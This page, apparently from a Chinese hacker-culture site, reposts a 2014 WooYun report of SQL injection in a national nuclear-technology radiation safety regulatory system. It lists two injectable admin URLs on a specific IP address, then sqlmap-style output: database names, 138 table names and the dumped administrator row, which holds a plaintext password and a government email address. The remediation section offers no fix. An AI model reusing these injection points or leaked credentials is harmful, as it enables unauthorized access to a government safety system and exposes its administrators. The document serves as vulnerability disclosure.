记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

国家核技术利用辐射安全监管系统SQl注入

2014-11-03 13:20

注入URL:

https://1.202.234.22/admin/singlelogin.php?submit=1&loginId=1

https://1.202.234.22/admin/list_ipAddressPolicy.php?GroupId=1



1.JPG





2.JPG





available databases [6]:

[*] information_schema

[*] iscserver

[*] iscserver_bak

[*] mysql

[*] performance_schema

[*] test



Database: iscserver

[138 tables]

+-------------------------+

| Admin |

| ApplyUser |

| AutoRouteOutInfo |

| BandIPMac |

| CRLPublish |

| CertCRL |

| CertReq |

| ClientAppLog |

| Configure |

| CurrentFlowStat |

| CurrentFlowStatBak |

| DEVICE_CONFIG |

| Domain |

| DomainAdmin |

| EMailConfig |

| ExpiredISCUserTable |

| FireWall |

| GWCurrentFlowStat |

| GWCurrentFlowStatBak |

| GWHistoryFlowStat |

| GWLink |

| GWLinkExtInfo |

| GroupNoCachePolicy |

| HWFeature |

| HWFeatureReq |

| HistoryFlowStat |

| HostCount |

| ISCGWTable |

| ISCGroupAnticrack |

| ISCGroupTable |

| ISCGroupTimePolicy |

| ISCGroupUserLoginPolicy |

| ISCIPPool |

| ISCMemberTable |

| ISCOnLineUser |

| ISCRoute |

| ISCSPPolicy |

| ISCSSRoute |

| ISCUpdate |

| ISCUserActivity |

| ISCUserActivityLog |

| ISCUserTable |

| ISCWebPluginPolicy |

| ISCWebPluginRule |

| ISCWorkloadTable |

| ISC_Account_Template |

| ISC_Algorithm_Para |

| ISC_Auth_Algorithm |

| ISC_Auth_Method |

| ISC_Method_Para |

| IpAddressPolicy |

| Ipsec_Tunnel |

| LogTable |

| LogType |

| MT_IpPool |

| MailAdminTable |

| Menu_Style |

| MobileInfoTable |

| NAT |

| NATConfig |

| NatMap |

| Policy |

| PortMap |

| PortalMap |

| ProgramConf |

| ProxyBackDomainTable |

| ProxyConfigTable |

| ProxyMapTable |

| ProxyPolicyTable |

| Radius |

| ReplacePatternTable |

| ResourceCategoryTable |

| ResourceIconTable |

| Rule |

| RuleViolateLog |

| SToSRule |

| SingleLoginUser |

| SinglePointLogin |

| Sproxy_App |

| Sproxy_Policy |

| SystemAlarmLogTable |

| SystemAlarmTable |

| Tunnel |

| TunnelRoute |

| TunnelRouteMasq |

| UrlCount |

| UrlLogRules |

| UrlLogTable |

| UserLoginAnticrack |

| UserNameCount |

| VirtualSiteTable |

| WebAppAccount |

| WebAppDesktop |

| WebAppGroup |

| WebPolicyTable |

| WebServer |

| cp_AntiSpyware |

| cp_AntiVirus |

| cp_FireWall |

| cp_NACPolicy |

| cp_OS |

| cp_OSFWpolicy |

| cp_OSpath |

| cp_Program |

| fw_AddressInterpret |

| fw_AddressMasquerading |

| fw_BandIPMac |

| fw_BuildIP |

| fw_DAddressMasquerading |

| fw_FireWall |

| fw_NatMap |

| fw_PortMap |

| fw_Resource |

| fw_SAddressMasquerading |

| g_WebServer |

| hot_device |

| u_Admin |

| u_Apply |

| u_ApplyCardType |

| u_ApplyConfig |

| u_ApplyDept |

| u_ApplyLei |

| u_ApplyOffice |

| u_ApplyRole |

| u_ApplyUsePurpose |

| u_Autoshenhe |

| u_Dzzy |

| u_LogTable |

| u_Mail |

| u_Nat |

| u_Tu_jdt |

| u_Tu_zxt |

| u_Web_gonggao |

| u_Web_iptong |

| u_Web_wenti |

| u_Web_wentihf |

| u_Webconf |

| u_shenhePolicy |

+-------------------------+



Database: iscserver

Table: Admin

[1 entry]

+---------+--------+--------+------------+--------------------+-----------+

| AdminId | State | Passwd | AdminName | EmailAddr | Privilege |

+---------+--------+--------+------------+--------------------+-----------+

| 1 | active | dep501 | SuperAdmin | rsms@rr.mep.gov.cn | abcde |

+---------+--------+--------+------------+--------------------+-----------+



漏洞证明:

1.JPG





2.JPG

修复方案:

他们懂的


知识来源: www.wooyun.org/bugs/wooyun-2014-076588

阅读:279275 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“国家核技术利用辐射安全监管系统SQl注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云